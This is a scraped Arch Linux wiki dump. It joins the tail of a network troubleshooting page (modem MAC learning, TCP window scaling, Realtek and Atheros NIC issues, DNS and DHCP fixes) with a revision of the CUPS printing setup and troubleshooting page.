Most domestic cable ISPs (videotron for example) have the cable modem configured to recognize only one client PC, by the MAC address of its network interface. Once the cable modem has learned the MAC address of the first PC or equipment that talks to it, it will not respond to another MAC address in any way. Thus if you swap one PC for another (or for a router), the new PC (or router) will not work with the cable modem, because the new PC (or router) has a MAC address different from the old one. To reset the cable modem so that it will recognise the new PC, you must power the cable modem off and on again. Once the cable modem has rebooted and gone fully online again (indicator lights settled down), reboot the newly connected PC so that it makes a DHCP request, or manually make it request a new DHCP lease.<br />
<br />
If this method does not work, you will need to clone the MAC address of the original machine. See also [[Configuring Network#Change MAC/hardware address|Change MAC/hardware address]].<br />
<br />
=== The TCP window scaling issue ===<br />
<br />
TCP packets contain a "window" value in their headers indicating how much data the other host may send in return. This value is represented with only 16 bits, hence the window size is at most 64Kb. TCP packets are cached for a while (they have to be reordered), and as memory is (or used to be) limited, one host could easily run out of it.<br />
<br />
Back in 1992, as more and more memory became available, [http://www.faqs.org/rfcs/rfc1323.html RFC 1323] was written to improve the situation: Window Scaling. The "window" value, provided in all packets, will be modified by a Scale Factor defined once, at the very beginning of the connection.<br />
<br />
That 8-bit Scale Factor allows the Window to be up to 32 times higher than the initial 64Kb.<br />
<br />
It appears that some broken routers and firewalls on the Internet are rewriting the Scale Factor to 0 which causes misunderstandings between hosts.<br />
<br />
The Linux kernel 2.6.17 introduced a new calculation scheme generating higher Scale Factors, virtually making the aftermaths of the broken routers and firewalls more visible.<br />
<br />
The resulting connection is at best very slow or broken.<br />
<br />
==== How to diagnose the problem ====<br />
<br />
First of all, let's make it clear: this problem is odd. In some cases, you will not be able to use TCP connections (HTTP, FTP, ...) at all and in others, you will be able to communicate with some hosts (very few).<br />
<br />
When you have this problem, the {{ic|dmesg}}'s output is OK, logs are clean and {{ic|ip addr}} will report normal status... and actually everything appears normal.<br />
<br />
If you cannot browse any website, but you can ping some random hosts, chances are great that you're experiencing this issue: ping uses ICMP and is not affected by TCP issues.<br />
<br />
You can try to use Wireshark. You might see successful UDP and ICMP communications but unsuccessful TCP communications (only to foreign hosts).<br />
<br />
==== How to fix it (The bad way) ====<br />
<br />
To fix it the bad way, you can change the tcp_rmem value, on which Scale Factor calculation is based. Although it should work for most hosts, it is not guaranteed, especially for very distant ones.<br />
<br />
# echo "4096 87380 174760" > /proc/sys/net/ipv4/tcp_rmem<br />
<br />
==== How to fix it (The good way) ====<br />
<br />
Simply disable Window Scaling. Since Window Scaling is a nice TCP feature, it may be uncomfortable to disable it, especially if you cannot fix the broken router. There are several ways to disable Window Scaling, and it seems that the most bulletproof way (which will work with most kernels) is to add the following line to {{ic|/etc/sysctl.conf}} (see also [[sysctl]])<br />
<br />
net.ipv4.tcp_window_scaling = 0<br />
<br />
==== How to fix it (The best way) ====<br />
<br />
This issue is caused by broken routers/firewalls, so let's change them. Some users have reported that the broken router was their very own DSL router.<br />
<br />
==== More about it ====<br />
<br />
This section is based on the LWN article [http://lwn.net/Articles/92727/ TCP window scaling and broken routers] and a Kernel Trap article: [http://kerneltrap.org/node/6723 Window Scaling on the Internet].<br />
<br />
There are also several relevant threads on the LKML.<br />
<br />
=== Realtek no link / WOL issue ===<br />
<br />
Users with Realtek 8168 8169 8101 8111(C) based NICs (cards / and on-board) may notice an issue where the NIC seems to be disabled on boot and has no Link light. This can usually be found on a dual boot system where Windows is also installed. It seems that using the offical Realtek drivers (dated anything after May 2007) under Windows is the cause. These newer drivers disable the Wake-On-LAN feature by disabling the NIC at Windows shutdown time, where it will remain disabled until the next time Windows boots. You will be able to notice if this issue is affecting you if the Link light remains off until Windows boots up; during Windows shutdown the Link light will switch off. Normal operation should be that the link light is always on as long as the system is on, even during POST. This issue will also affect other operative systems without newer drivers (eg. Live CDs). Here are a few fixes for this issue:<br />
<br />
==== Method 1 - Rollback/change Windows driver ====<br />
<br />
You can roll back your Windows NIC driver to the Microsoft provided one (if available), or roll back/install an official Realtek driver pre-dating May 2007 (may be on the CD that came with your hardware).<br />
<br />
==== Method 2 - Enable WOL in Windows driver ====<br />
<br />
Probably the best and the fastest fix is to change this setting in the Windows driver. This way it should be fixed system-wide and not only under Arch (eg. live CDs, other operative systems). In Windows, under Device Manager, find your Realtek network adapter and double-click it. Under the Advanced tab, change "Wake-on-LAN after shutdown" to Enable.<br />
<br />
In Windows XP (example)<br />
Right click my computer<br />
--> Hardware tab<br />
--> Device Manager<br />
--> Network Adapters<br />
--> "double click" Realtek ...<br />
--> Advanced tab<br />
--> Wake-On-Lan After Shutdown<br />
--> Enable<br />
<br />
{{Note|Newer Realtek Windows drivers (tested with ''Realtek 8111/8169 LAN Driver v5.708.1030.2008'', dated 2009/01/22, available from GIGABYTE) may refer to this option slightly differently, like ''Shutdown Wake-On-LAN --> Enable''. It seems that switching it to {{ic|Disable}} has no effect (you will notice the Link light still turns off upon Windows shutdown). One rather dirty workaround is to boot to Windows and just reset the system (perform an ungraceful restart/shutdown) thus not giving the Windows driver a chance to disable LAN. The Link light will remain on and the LAN adapter will remain accessible after POST - that is until you boot back to Windows and shut it down properly again.}}<br />
<br />
==== Method 3 - Newer Realtek Linux driver ====<br />
<br />
Any newer driver for these Realtek cards can be found for Linux on the realtek site. (untested but believed to also solve the problem).<br />
<br />
==== Method 4 - Enable ''LAN Boot ROM'' in BIOS/CMOS ====<br />
<br />
It appears that setting ''Integrated Peripherals --> Onboard LAN Boot ROM --> Enabled'' in BIOS/CMOS reactivates the Realtek LAN chip on system boot-up, despite the Windows driver disabling it on OS shutdown.<br />
<br><small>This was tested successfully multiple times with GIGABYTE system board GA-G31M-ES2L with BIOS version F8 released on 2009/02/05. YMMV.</small><br />
<br />
=== DLink G604T/DLink G502T DNS issue ===<br />
<br />
Users with a DLink G604T/DLink G502T router, using DHCP and have firmware v2.00+ (typically users with AUS firmware) may have issues with certain programs not resolving the DNS. One of these programs are unfortunatley pacman. The problem is basically the router in certain situations is not sending the DNS properly to DHCP, which causes programs to try and connect to servers with an IP address of 1.0.0.0 and fail with a connection timed out error<br />
<br />
==== How to diagnose the problem ====<br />
<br />
The best way to diagnose the problem is to use Firefox/Konqueror/links/seamonkey and to enable wget for pacman. If this is a fresh install of Arch Linux, then you may want to consider installing {{ic|links}} through the live CD.<br />
<br />
Firstly, enable wget for pacman (since it gives us info about pacman when it is downloading packages)<br />
Open {{ic|/etc/pacman.conf}} with your favourite editor and uncomment the following line (remove the # if it is there)<br />
<br />
XferCommand=/usr/bin/wget --passive-ftp -c -O %o %u<br />
<br />
While you are editing {{ic|/etc/pacman.conf}}, check the default mirror that pacman uses to download packages.<br />
<br />
Now open up the default mirror in an Internet browser to see if the mirror actually works. If it does work, then do {{ic|pacman -Syy}} (otherwise pick another working mirror and set it to the pacman default). If you get something similar to the following (notice the 1.0.0.0),<br />
<br />
<nowiki>ftp://mirror.pacific.net.au/linux/archlinux/extra/os/i686/extra.db.tar.gz</nowiki><br />
=> '/var/lib/pacman/community.db.tar.gz.part'<br />
Resolving mirror.pacific.net.au... 1.0.0.0<br />
<br />
then you most likely have this problem. The 1.0.0.0 means it is unable to resolve DNS, so we must add it to {{ic|/etc/resolv.conf}}.<br />
<br />
==== How to fix it ====<br />
<br />
Basically what we need to do is to manually add the DNS servers to our {{ic|/etc/resolv.conf}} file. The problem is that DHCP automatically deletes and replaces this file on boot, so we need to edit {{ic|/etc/conf.d/dhcpcd}} and change the flags to stop DHCP from doing this.<br />
<br />
When you open {{ic|/etc/conf.d/dhcpcd}}, you should see something close to the following:<br />
<br />
DHCPCD_ARGS="-t 30 -h $HOSTNAME"<br />
<br />
Add the {{ic|-R}} flag to the arguments, e.g.,<br />
<br />
DHCPCD_ARGS="-R -t 30 -h $HOSTNAME"<br />
<br />
{{Note|1=If you are using {{Pkg|dhcpcd}} >= 4.0.2, the {{ic|-R}} flag has been deprecated. Please see the [[#For DHCP assigned IP address]] section for information on how to use a custom {{ic|/etc/resolv.conf}} file.}}<br />
<br />
Save and close the file; now open {{ic|/etc/resolv.conf}}. You should see a single nameserver (most likely 10.1.1.1). This is the gateway to your router, which we need to connect to in order to get the DNS servers of your ISP. Paste the IP address into your browser and log in to your router. Go to the DNS section, and you should see an IP address in the Primary DNS Server field; copy it and paste it as a nameserver '''ABOVE''' the current gateway one.<br />
<br />
For example, {{ic|/etc/resolv.conf}} should look something along the lines of:<br />
<br />
nameserver 10.1.1.1<br />
<br />
If my primary DNS server is 211.29.132.12, then change {{ic|/etc/resolv.conf}} to:<br />
<br />
nameserver 211.29.132.12<br />
nameserver 10.1.1.1<br />
<br />
Now restart the network daemon by running {{ic|systemctl restart dhcpcd@<interface>}} and do {{ic|pacman -Syy}}. If it syncs correctly with the server, then the problem is solved.<br />
<br />
==== More about it ====<br />
<br />
This is the whirlpool forum (Australian ISP community) which talks about and gives the same solution to the problem:<br />
<br />
http://forums.whirlpool.net.au/forum-replies-archive.cfm/461625.html<br />
<br />
=== Check DHCP problem by releasing IP first ===<br />
<br />
Problem may occur when DHCP get wrong IP assignment. For example when two routers are tied together through VPN. The router that is connected to me by VPN may assigning IP address. To fix it. On a console, as root, release IP address:<br />
<br />
# dhcpcd -k<br />
<br />
Then request a new one:<br />
<br />
# dhcpcd<br />
<br />
Maybe you had to run those two commands many times.<br />
<br />
<br />
=== No eth0 with Atheros AR8161 ===<br />
<br />
With the Atheros AR8161 Gigabit Ethernet card, the ethernet connection is not working out-of-the-box (with the installation media of March 2013). The module "alx" needs to be loaded but is not present.<br />
<br />
The driver from [http://linuxwireless.org/en/users/Download/stable/#compat-wireless_stable_releases compat-wireless] (that has become [https://backports.wiki.kernel.org/index.php/Releases compat-drives] since linux 3.7) need to be installed. The "-u" postfix annotates that Qualcomm have applied a driver under a unified driver.<br />
$ wget https://www.kernel.org/pub/linux/kernel/projects/backports/2013/03/04/compat-drivers-2013-03-04-u.tar.bz2<br />
$ tar xjf compat*<br />
$ cd compat*<br />
$ ./scripts/driver-select alx<br />
$ make<br />
$ sudo make install<br />
$ sudo modprobe alx<br />
<br />
The alx driver has not been added to Linux kernel due to various issues. Compatibility between the different kernel versions has been spotty. For better support follow the [http://lists.infradead.org/mailman/listinfo/unified-drivers mailing list]and [http://www.linuxfoundation.org/collaborate/workgroups/networking/alx alx page]for latest working solution for alx.<br />
<br />
The driver must be built and installed after every kernel change.<br />
<br />
Alternatively you can use the AUR package for [https://aur.archlinux.org/packages/compat-drivers-patched/ compat drivers], which installs many other drivers.<br />
<br />
=== No eth0 with Atheros AR9485 ===<br />
<br />
The ethernet (eth0) for Atheros AR9485 are not working out-of-the-box (with installation media of March 2013). The working solution for this is to install the package [https://aur.archlinux.org/packages/compat-drivers-patched/ compat-drivers-patched] from AUR.</div>Wakehttps://wiki.archlinux.org/index.php?title=CUPS&diff=251533CUPS2013-03-21T13:22:03Z<p>Wake: /* CUPS administration */ SystemGroup line goes in /etc/cups/cups-files.conf.</p>
<hr />
<div>[[Category:Printers]]<br />
[[cs:CUPS]]<br />
[[es:CUPS]]<br />
[[fr:CUPS]]<br />
[[it:CUPS]]<br />
[[pl:CUPS]]<br />
[[ru:CUPS]]<br />
[[th:CUPS]]<br />
[[tr:CUPS]]<br />
[[zh-CN:CUPS]]<br />
[[zh-TW:CUPS]]<br />
{{Article summary start|Summary}}<br />
{{Article summary text|Installing and configuring CUPS}}<br />
{{Article summary heading|Related}}<br />
{{Article summary wiki|CUPS printer sharing}}<br />
{{Article summary wiki|CUPS printer-specific problems}}<br />
{{Article summary wiki|Samba}}<br />
{{Article summary end}}<br />
<br />
From [http://www.cups.org/index.php CUPS' site]:<br />
:"''[[Wikipedia:CUPS|CUPS]] is the standards-based, open source printing system developed by Apple Inc. for OS® X and other UNIX®-like operating systems''".<br />
<br />
Although there are other printing packages such as LPRNG, the Common Unix Printing System is the most popular choice because of its relative ease of use.<br />
<br />
==CUPS Linux Printing workflow==<br />
As of {{Pkg|cups}} version 1.5.3-3, Arch Linux makes use of the new full pdf-based printing workflow. For<br />
further reading check [http://www.linuxfoundation.org/collaborate/workgroups/openprinting/pdfasstandardprintjobformat PDF standard printing job format] and an old [https://wiki.linuxfoundation.org/en/OpenPrinting/Database/CUPS-Filter-Chart CUPS filtering chart] for history and fun.<br />
A good starting point for general Linux printing questions is [http://www.linuxfoundation.org/collaborate/workgroups/openprinting here].<br />
<br />
There are two ways to setup a printer.<br />
* If there's a CUPS server running in your network and sharing a printer you only need to install the client package.<br />
* If the printer is connected directly to your system or you have access to an IPP network printer then setup a local CUPS server.<br />
<br />
==Installing the client package==<br />
The package {{Pkg|libcups}} is the only required package. [[pacman|Install]] it from the [[Official repositories]].<br />
<br />
Then add your CUPS server's IP address or hostname into {{ic|/etc/cups/client.conf}}. That is all you need. Every application should quickly find the printer(s) shared by that CUPS server.<br />
<br />
===Optional advanced network setup===<br />
It is also possible to run a entire cupsd+cups-browsed instance on your client with Avahi browsing enabled to discover unknown shared printers in your network. This can be useful in large setups where the server is unknown.<br />
{{Note|This behavior did not change with cups 1.6.x - the difference is that until 1.5.x cupsd was able to do printer browsing alone and now it can only browse its own shared printers.<br />
To get the local cupsd recognise other shared printers offered by a remote cupsd server you need a running local cups-browserd (supported since cups-filters 1.0.26) instance using Avahi to discover unknown printers.}}<br />
<br />
==Installing the server packages==<br />
The following packages and some printer drivers are needed. [[pacman|Install]] them from the [[Official repositories]].<br />
<br />
* {{Pkg|cups}} - the actual CUPS daemon<br />
* {{Pkg|cups-filters}} - essential filters<br />
* {{Pkg|ghostscript}} - (optional) PostScript interpreter<br />
* {{Pkg|gsfonts}} - GhostScript standard Type1 fonts<br />
<br />
# pacman -S cups cups-filters ghostscript gsfonts<br />
<br />
If you want to enable printer browsing through your network, also install {{Pkg|avahi}}. Make sure '''avahi-daemon''' is started before '''cupsd'''.<br />
<br />
If the system is connected to a networked printer using the [[Samba]] protocol or if the system is to be a print server for Windows clients, also install {{Pkg|samba}}.<br />
<br />
===Printer driver===<br />
Here are some of the driver packages. Choosing the right driver depends on the printer:<br />
<br />
* '''{{Pkg|gutenprint}}''' - A collection of high quality drivers for Canon, Epson, Lexmark, Sony, Olympus, and PCL printers for use with GhostScript, CUPS, Foomatic, and the [[GIMP]]<br />
* '''{{Pkg|foomatic-db}}, {{Pkg|foomatic-db-engine}}, {{Pkg|foomatic-db-nonfree}}, and {{Pkg|foomatic-filters}}''' - Foomatic is a database-driven system for integrating free software printer drivers with common spoolers under Unix. Installing foomatic-filters should solve problems if the cups error_log is reporting "stopped with status 22!".<br />
* '''{{Pkg|hplip}}''' - HP drivers for DeskJet, OfficeJet, Photosmart, Business Inkjet and some LaserJet printer models, as well as a number of Brother printers.<br />
* '''{{Pkg|splix}}''' - Samsung drivers for SPL (Samsung Printer Language) printers.<br />
<br />
* '''{{AUR|foo2zjs}}''' - Drivers for ZjStream protocol printers such as the HP Laserjet 1018. More info [http://foo2zjs.rkkda.com here]. Package is available in the [[AUR]].<br />
* '''{{AUR|hpoj}}''' - If you are using an HP Officejet, you should also install this package and follow the instructions to avoid problems as in [https://answers.launchpad.net/hplip/+question/133425 this thread]. Package is available in the [[AUR]].<br />
* '''{{AUR|samsung-unified-driver}}''' - Unified Linux Driver for Samsung printers and scanners. Required for new printers such as the ML-2160. Package is available in the [[AUR]].<br />
* '''{{AUR|ufr2}}''' or '''{{AUR|cndrvcups-lb}}''' - Canon UFR2 driver with support for LBP, iR and MF series printers. Package is available in the [[AUR]].<br />
<br />
* '''{{Pkg|cups-pdf}}''' - A package that allows one to setup a virtual PDF Printer that generates a PDF out of jobs sent to it<br />
<br />
If you are not sure of what driver package to install or if the current driver is not working, it may be easiest to just install all of the drivers. Some of the package names are misleading because printers of other makes may rely on them. For example, the Brother HL-2140 needs the hplip driver installed.<br />
<br />
====Download printer PPD====<br />
Depending on the printer, this step is optional and may not be needed, as the standard CUPS installation already comes with quite a few PPD (Postscript Printer Description) files. Moreover, the ''foomatic-filters'', ''gimp-print'' and ''hplip'' packages already include quite a few PPD files which will automatically be detected by CUPS.<br />
<br />
Here is an explanation of what a PPD file is from the Linux Printing website:<br />
:"''For every PostScript printer the manufacturers provide a PPD file which contains all printer-specific information about the particular printer model: Basic printer capabilities as whether the printer is a color printer, fonts, PostScript level, etc., and especially the user-adjustable options, as paper size, resolution, etc.''"<br />
<br />
If the PPD for the printer is ''not'' already in CUPS, then:<br />
*check [[AUR]] to see if there are packages for the printer/manufacturer<br />
*visit the [http://www.openprinting.org/printers OpenPrinting database] and select the manufacturer and model of the printer<br />
*visit the manufacturer's site and search for GNU/Linux drivers<br />
<br />
{{Note|PPD files go in {{ic|/usr/share/cups/model/}}}}<br />
<br />
====Another source for printer drivers====<br />
[http://www.turboprint.de/english.html Turboprint] is a proprietary driver for many printers not yet supported by GNU/Linux (Canon i*, for example). Unlike CUPS, however, high quality prints are either marked with a watermark or are a pay-only service.<br />
<br />
==Hardware support and configuration==<br />
<br />
USB printers can get accessed with two methods: The usblp kernel module and libusb. The former is the classic way. It is simple: data is sent to the printer by writing it to a device file as a simple serial data stream. Reading the same device file allows bi-di access, at least for things like reading out ink levels, status, or printer capability information (PJL). It works very well for simple printers, but for multi-function devices (printer/scanner) it is not suitable and manufacturers like HP supply their own backends. Source: [http://lists.linuxfoundation.org/pipermail/printing-architecture/2012/002412.html here].<br />
<br />
===Kernel modules===<br />
Before using the CUPS web interface, the appropriate kernel modules need to be installed. The following steps are from the Gentoo Printing Guide.<br />
<br />
This section may not be necessary, however, depending on which kernel is being used. The kernel module may load automatically after plugging in the printer. Use the {{ic|tail}} command (described below) to see if the printer has already been detected. The {{ic|lsmod}} utility can also be used to see what modules have been loaded.<br />
<br />
====USB printers====<br />
{{Warning|As of {{pkg|cups}} version 1.6.0, you no longer need to [[Kernel modules#Blacklisting|blacklist]] the {{ic|usblp}} kernel module.}}<br />
If you find out this is the only way to fix a remaining issue please report this upstream to the CUPS bug tracker and maybe also get in contact with Till Kamppeter (Debian CUPS maintainer). See [http://cups.org/str.php?L4128 upstream bug] for more.<br />
<br />
Some USB printer users may want to try if blacklisting the {{ic|usblp}} module would help:<br />
<br />
{{hc|/etc/modprobe.d/blacklist.conf|blacklist usblp}}<br />
<br />
Custom kernel users may need to manually load the {{ic|usbcore}} module before proceeding:<br />
# modprobe usbcore<br />
<br />
Once the modules are installed, plug in the printer and check if the kernel detected it by running the following:<br />
# tail /var/log/messages.log<br />
or<br />
# dmesg<br />
<br />
If you're using {{ic|usblp}}, the output should indicate that the printer has been detected like so:<br />
Feb 19 20:17:11 kernel: printer.c: usblp0: USB Bidirectional<br />
printer dev 2 if 0 alt 0 proto 2 vid 0x04E8 pid 0x300E<br />
Feb 19 20:17:11 kernel: usb.c: usblp driver claimed interface cfef3920<br />
Feb 19 20:17:11 kernel: printer.c: v0.13: USB Printer Device Class driver<br />
<br />
If you blacklisted {{ic|usblp}}, you will see something like:<br />
usb 3-2: new full speed USB device using uhci_hcd and address 3<br />
usb 3-2: configuration #1 chosen from 1 choice<br />
<br />
====Parallel port printers====<br />
To use a parallel port printer the configuration is pretty much the same, except for the modules:<br />
# modprobe lp<br />
# modprobe parport<br />
# modprobe parport_pc<br />
<br />
Once again, check the setup by running:<br />
# tail /var/log/messages.log<br />
It should display something like this:<br />
lp0: using parport0 (polling).<br />
<br />
If you are using a USB to parallel port adapter, CUPS will not be able to detect the printer. As a workaround, add the printer using a different connection type and then change DeviceID in {{ic|/etc/cups/printers.conf}}:<br />
DeviceID = parallel:/dev/usb/lp0<br />
<br />
====Auto-loading====<br />
It is convenient to have the system automatically load the kernel module every time it starts up. To do so, use a text editor to open up {{ic|/etc/modules-load.d/printing.conf}} and add the appropriate modules one per line. Here is an example:<br />
lp<br />
parport<br />
parport_pc<br />
<br />
=== HP Printer ===<br />
HP printers can also be installed via HP's linux setup tool. If you want to run the setup tool, ensure you have {{ic|python2-qt}} and {{ic|pygobject}}.<br />
<br />
To run with qt frontend :<br />
{{bc|<nowiki><br />
# hp-setup -u<br />
</nowiki>}}<br />
<br />
To run with command line : <br />
{{bc|<nowiki><br />
# hp-setup -i<br />
</nowiki>}}<br />
PPD files are in {{ic|/usr/share/ppd/HP/}}.<br />
<br />
For printers that require the proprietary HP plugin (like the P1102w), install the {{AUR|hplip-plugin}} package from [[AUR]].<br />
<br />
==Configuring==<br />
Now that CUPS is installed, there are a variety of options on how to set up printing solutions. As always, the tried and true command line method is at your disposal. CUPS also embeds a full-featured web interface. Likewise, various desktop environments such as GNOME and KDE have useful programs that can help manage printers. Depending on your needs, you may choose one method or the other.<br />
<br />
If you are planning on connecting to a network printer, rather than one that is directly connected to the computer, you might want to read the [[CUPS printer sharing]] page first. Printer sharing between GNU/Linux systems is quite easy and involves very little configuration, whereas sharing between a Windows and GNU/Linux host requires a little bit more effort.<br />
<br />
===CUPS daemon===<br />
With the kernel modules installed, you can now start the '''cups''' and optionally, the '''cups-browsed''' [[daemons]].<br />
<br />
=== Web interface and tool-kit ===<br />
<br />
Once the daemon is running, open a browser and go to: http://localhost:631 (''The '''localhost''' string may need to be replaced with the hostname found in'' {{ic|/etc/hostname}}).<br />
<br />
From here, follow the various wizards to add the printer. A usual procedure is to start by clicking on ''Adding Printers and Classes'' and then ''Add Printer''. When prompted for a username and password, log in as root. The name assigned to the printer does not matter, the same applies for 'location' and 'description'. Next, a list of devices to select from will be presented. The actual name of the printer shows up next to the label (e.g., next to ''USB Printer #1'' for USB printers). Finally, choose the appropriate drivers and the configuration is complete.<br />
<br />
Now test the configuration by pressing the ''Maintenance'' drop-down menu then ''Print Test Page''. If it does not print and there is certainty regarding the correctness of applied settings, then the problem is most likely due to missing a proper printer driver.<br />
<br />
{{Tip|See: [[#Alternative CUPS interfaces]] for other other front-ends.}}<br />
{{Note|When setting up a USB printer, you should see your printer listed on ''Add Printer'' page. If you can only see a "SCSI printer" option, it probably means that CUPS has failed to recognize <br />
your printer.}}<br />
<br />
{{Note|To enable wireless scanning on certain HP multi-function devices using the {{pkg|hplip}} package, you may need to add the printer as a Network Printer using the http:// protocol. To determine the proper URI to use, run the {{ic|hp-makeuri}} command.}}<br />
<br />
==== CUPS administration ====<br />
<br />
A username and password will be required when administering the printer in the web interface, such as: adding or removing printers, stopping print tasks, etc. The default username is the one assigned in the ''sys'' group, or root. Other admin groups (e.g. lpadmin or printadmin) may be added to the {{ic|SystemGroup}} line in {{ic|/etc/cups/cups-files.conf}} (you might have to add this line). See [http://www.cups.org/articles.php?L237+T+Qprintadmin these instructions at cups.org]. You might also want to read [https://bbs.archlinux.org/viewtopic.php?id=35567 this post]. Create the group[s] ({{ic|man groupadd}}) and add the group[s] to users ({{ic|man usermod}}). cupsd must be restarted and the user must re-login for these changes to take affect.<br />
<br />
If the root account has been locked (i.e. when using sudo), it is not possible to log in the CUPS administration interface with the default username (root) and password. Follow the instructions above to add other users as cups administrators.<br />
<br />
====Remote access to web interface====<br />
By default, the CUPS web interface can only be accessed by the ''localhost''; i.e. the computer that it is installed on. To remotely access the interface, make the following changes to the {{ic|/etc/cups/cupsd.conf}} file. Replace the line:<br />
Listen localhost:631<br />
with<br />
Port 631<br />
so that CUPS listens to incoming requests.<br />
<br />
Three levels of access can be granted:<br />
<Location /> #access to the server<br />
<Location /admin> #access to the admin pages<br />
<Location /admin/conf> #access to configuration files<br />
<br />
To give remote hosts access to one of these levels, add an {{ic|Allow}} statement to that level's section. An {{ic|Allow}} statement can take one or more of the forms listed below:<br />
Allow from all<br />
Allow from host.domain.com<br />
Allow from *.domain.com<br />
Allow from ip-address<br />
Allow from ip-address/netmask<br />
<br />
Deny statements can also be used. For example, if wanting to give all hosts on the 192.168.1.0/255.255.255.0 subnet full access, file {{ic|/etc/cups/cupsd.conf}} would include this:<br />
# Restrict access to the server...<br />
# By default only localhost connections are possible<br />
<Location /><br />
Order allow,deny<br />
Allow from localhost<br />
'''Allow from 192.168.1.0/255.255.255.0'''<br />
</Location><br />
<br />
# Restrict access to the admin pages...<br />
<Location /admin><br />
# Encryption disabled by default<br />
#Encryption Required<br />
Order allow,deny<br />
Allow from localhost<br />
'''Allow from 192.168.1.0/255.255.255.0'''<br />
</Location><br />
<br />
# Restrict access to configuration files...<br />
<Location /admin/conf><br />
AuthType Basic<br />
Require user @SYSTEM<br />
Order allow,deny<br />
Allow From localhost<br />
'''Allow From 192.168.1.0/255.255.255.0'''<br />
</Location><br />
<br />
You might also need to add:<br />
<br />
DefaultEncryption Never<br />
<br />
This should avoid the error: 426 - Upgrade Required when using the CUPS web interface from a remote machine.<br />
<br />
===Command-line configuration===<br />
<br />
CUPS can be fully controlled from command-line with nice tools, ''i.e.'' the lp* and the cups* command families.<br />
<br />
On Arch Linux, most commands support auto-completion with common shells.<br />
Also note that command-line switches cannot be grouped.<br />
<br />
;List the devices<br />
# lpinfo -v<br />
<br />
;List the drivers<br />
# lpinfo -m<br />
<br />
;Add a new printer<br />
# lpadmin -p <printer> -E -v <device> -P <ppd><br />
<br />
The <printer> is up to you. The device can be retrieved from the 'lpinfo -i' command.<br />
Example:<br />
# lpadmin -p HP_DESKJET_940C -E -v "usb://HP/DESKJET%20940C?serial=CN16E6C364BH" -P /usr/share/ppd/HP/hp-deskjet_940c.ppd.gz<br />
<br />
In the following, the <printer> references the name you have used here to set up the printer.<br />
<br />
;Set the default printer<br />
$ lpoptions -d <printer><br />
<br />
;Check the status<br />
$ lpstat -s<br />
$ lpstat -p <printer><br />
<br />
;Deactivate a printer<br />
# cupsdisable <printer><br />
<br />
;Activate a printer<br />
# cupsenable <printer><br />
<br />
;Remove a printer<br />
First set it to reject all incoming entries:<br />
# cupsreject <printer><br />
Then disable it.<br />
# cupsdisable <printer><br />
Finally remove it.<br />
# lpadmin -x <printer><br />
<br />
;Print a file<br />
$ lpr <file><br />
$ lpr -# 17 <file> # print the file 17 times<br />
$ echo "Hello, world!" | lpr -p # print the result of a command. The -p switch adds a header.<br />
<br />
;Check the printing queue<br />
$ lpq<br />
$ lpq -a # on all printers<br />
<br />
;Clear the printing queue<br />
# lprm # remove last entry only<br />
# lprm - # remove all entries<br />
<br />
===GNOME CUPS interface===<br />
If using [[GNOME]], a possibility is to manage and configure the printer by [[pacman|installing]] {{Pkg|system-config-printer}}.<br />
<br />
For system-config-printer to work as it should, running as root may be required, or alternatively set up a "normal" user to administer CUPS (if so '''follow steps 1-3''')<br />
<br />
* 1. Create group, and add a user to it<br />
# groupadd lpadmin<br />
# usermod -aG lpadmin <username><br />
<br />
* 2. Add "lpadmin" (without the quotes) to this line in {{ic|/etc/cups/cupsd.conf}}<br />
SystemGroup sys root <insert here><br />
<br />
* 3. Restart cups, log out and in again (or restart computer)<br />
{{bc|# systemctl restart cups}}<br />
<br />
[[KDE]] users can modify their printers from the Control Center. Both should refer to those desktop environments' documentation for more information on how to use the interfaces.<br />
<br />
There is also {{AUR|gtklp}} in the [[AUR]].<br />
<br />
==PDF virtual printer==<br />
CUPS-PDF is a nice package that allows one to setup a virtual printer that will generate a PDF from anything sent to it. This package is not necessary, but it can be quite useful. It can be installed using the following command:<br />
# pacman -S cups-pdf<br />
<br />
After installing the package, set it up as if it were for any other printer by using the web interface. Access the cups print manager: http://localhost:631 and select:<br />
Administration -> Add Printer<br />
Select CUPS-PDF (Virtual PDF), choose for the make and driver:<br />
Make: Generic<br />
Driver: Generic CUPS-PDF Printer<br />
<br />
Find generated PDF documents in a sub-directory located at {{ic|/var/spool/cups-pdf}}. Normally, the subdirectory is named after the user who performed the job. A little tweak helps you to find your printed PDF documents more easily. Edit {{ic|/etc/cups/cups-pdf.conf}} by changing the line<br />
#Out /var/spool/cups-pdf/${USER}<br />
<br />
to<br />
<br />
Out ${HOME}<br />
<br />
=== Print to PostScript ===<br />
The CUPS-PDF (Virtual PDF Printer) actually creates a PostScript file and then creates the PDF using the ps2pdf utility. To print to PostScript, just print as usual, in the print dialog choose "CUPS-PDF" as the printer, then select the checkbox for "print to file", hit print, enter the filename.ps and click save. This is handy for faxes, etc...<br />
<br />
==Troubleshooting==<br />
The best way to get printing working is to set 'LogLevel' in {{ic|/etc/cups/cupsd.conf}} to:<br />
LogLevel debug<br />
<br />
And then viewing the output from {{ic|/var/log/cups/error_log}} like this:<br />
# tail -n 100 -f /var/log/cups/error_log<br />
<br />
The characters at the left of the output stand for:<br />
*D=Debug<br />
*E=Error<br />
*I=Information<br />
*And so on<br />
<br />
These files may also prove useful:<br />
*{{ic|/var/log/cups/page_log}} - Echoes a new entry each time a print is successful<br />
*{{ic|/var/log/cups/access_log}} - Lists all cupsd http1.1 server activity<br />
<br />
Of course, it is important to know how CUPS works if wanting to solve related issues:<br />
# An application sends a .ps file (PostScript, a script language that details how the page will look) to CUPS when 'print' has been selected (this is the case with most programs).<br />
# CUPS then looks at the printer's PPD file (printer description file) and figures out what filters it needs to use to convert the .ps file to a language that the printer understands (like PJL, PCL), usually GhostScript.<br />
# GhostScript takes the input and figures out which filters it should use, then applies them and converts the .ps file to a format understood by the printer.<br />
# Then it is sent to the back-end. For example, if the printer is connected to a USB port, it uses the USB back-end.<br />
<br />
Print a document and watch {{ic|error_log}} to get a more detailed and correct image of the printing process.<br />
<br />
===Problems resulting from upgrades===<br />
''Issues that appeared after CUPS and related program packages underwent a version increment''<br />
<br />
====CUPS stops working====<br />
The chances are that a new configuration file is needed for the new version to work properly. Messages such as "404 - page not found" may result from trying to manage CUPS via localhost:631, for example.<br />
<br />
To use the new configuration, copy {{ic|/etc/cups/cupsd.conf.default}} to {{ic|/etc/cups/cupsd.conf}} (backup the old configuration if needed) and restart CUPS to employ the new settings.<br />
<br />
====All jobs are "stopped"====<br />
If all jobs sent to the printer become "stopped", delete the printer and add it again.<br />
Using the [http://localhost:631 CUPS web interface], go to Printers > Delete Printer.<br />
<br />
